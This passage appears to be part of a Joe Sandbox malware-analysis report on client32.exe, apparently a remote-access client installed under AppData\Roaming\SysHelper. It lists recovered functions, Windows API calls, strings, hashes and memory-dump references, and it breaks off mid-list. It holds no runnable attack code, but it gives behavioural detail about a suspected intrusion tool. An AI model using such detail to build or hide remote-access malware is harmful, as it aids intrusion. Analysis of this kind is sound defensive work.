Opcode Fuzzy Hash: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
Instruction Fuzzy Hash: DB219435A402189BDB10DA64DC50BAAB3F8BF98254F808599E919D7280EF31AD44CBA1

Function 1102CD10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,CF3D35D0,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

CreateEventA.KERNEL32 ref: 1102CD8A

Strings

DisableGeolocation, xrefs: 1102CD3E
Client, xrefs: 1102CD43

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 2598271332-4166767992
Opcode ID: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
Opcode Fuzzy Hash: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84

Function 11026E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A

Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,75C0A1D0,75BF3760,75BF7A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34

TranslateMessage.USER32(?), ref: 11026E60
DispatchMessageA.USER32(?), ref: 11026E66

Strings

Exit Msgloop, quit=%d, xrefs: 11026E9D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2

Function 1110C420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1110C454

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

_memset.LIBCMT ref: 1110C477

Strings

Can't alloc %u bytes, xrefs: 1110C44E
..\ctl32\Refcount.cpp, xrefs: 1110C465

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 1322847840-2664294811
Opcode ID: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
Opcode Fuzzy Hash: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5

Function 11017610 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1101761D

Part of subcall function 11017520: WaitForSingleObject.KERNEL32(000002EC,000000FF), ref: 1101755C
Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0

Part of subcall function 11017440: WaitForSingleObject.KERNEL32(000002EC,000000FF), ref: 11017472
Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500

SetEvent.KERNEL32(000002EC), ref: 1101763D
GetTickCount.KERNEL32 ref: 11017643

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleTickUninitializeWait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3357037191-4122679463
Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2

Function 68594FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
SetLastError.KERNEL32(00000078,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FED

Strings

EnumProcessModules, xrefs: 68594FBE

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressEnumErrorLastModulesProcProcess
String ID: EnumProcessModules
API String ID: 3858832252-3735562946
Opcode ID: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
Instruction ID: c6008895448c7ea24cf5e3f5aa5c2c106650779afcf18f2532c2e3569412b958
Opcode Fuzzy Hash: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
Instruction Fuzzy Hash: 41F08C72650218AFCB20DFA8D844E9B77A8EB48721F40C81AFD6AD7740C670EC10CFA0

Function 68595000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
SetLastError.KERNEL32(00000078,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6859503D

Strings

GetModuleFileNameExA, xrefs: 6859500E

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorFileLastModuleNameProc
String ID: GetModuleFileNameExA
API String ID: 4084229558-758377266
Opcode ID: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
Instruction ID: e23656c5dac0cf9fa05560afcc68164bbb297e952d00726f289e8e4ae625ec2a
Opcode Fuzzy Hash: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
Instruction Fuzzy Hash: 77F08272600218AFC720DF94E804E9B77A8EB48711F40451BFD45D7240C671F810CBF5

Function 11134C80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5

Strings

*AutoICFConfig, xrefs: 11134C97
Client, xrefs: 11134C9C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D

Function 1106FD70 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 1106FDC7
EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6

Strings

Push, xrefs: 1106FD96

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92

Function 6859A4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
String ID:
API String ID: 4212191310-0
Opcode ID: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
Instruction ID: 535f9a0d7001d5bb9c61b1ab5c8456b419707014113600a3913e4554816d070a
Opcode Fuzzy Hash: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
Instruction Fuzzy Hash: BC21AAB6E00650EFDF129F18C8456DEB7FAEF86315F824417DC65A3240D771A9408B66

Function 68595C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(97A234B3,4004667F,00000000,a3Zh), ref: 68595D1F
select.WSOCK32(00000001,?,00000000,?,00000000,97A234B3,4004667F,00000000,a3Zh), ref: 68595D62

Strings

a3Zh, xrefs: 68595D0E

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ioctlsocketselect
String ID: a3Zh
API String ID: 1457273030-2278443015
Opcode ID: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
Instruction ID: f4d72408498c597f28c5e98b0793ceec49d4e0105455f2fa7991f5df7ed328ba
Opcode Fuzzy Hash: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
Instruction Fuzzy Hash: 54210E71A003189BEB28DF14C9657EDB7B9EF88305F4081EAA80A97281DB745F94DF90

Function 11140290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\client32.exe,00000104,?,111404E3,?), ref: 111402B9

Strings

C:\Users\user\AppData\Roaming\SysHelper\client32.exe, xrefs: 111402A4, 111402B2

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\Users\user\AppData\Roaming\SysHelper\client32.exe
API String ID: 2251294070-1429985935
Opcode ID: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
Opcode Fuzzy Hash: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791

Function 110151B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
CloseHandle.KERNEL32(00000000), ref: 110151D8

Strings

\\.\NSWFPDrv, xrefs: 110151C2

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
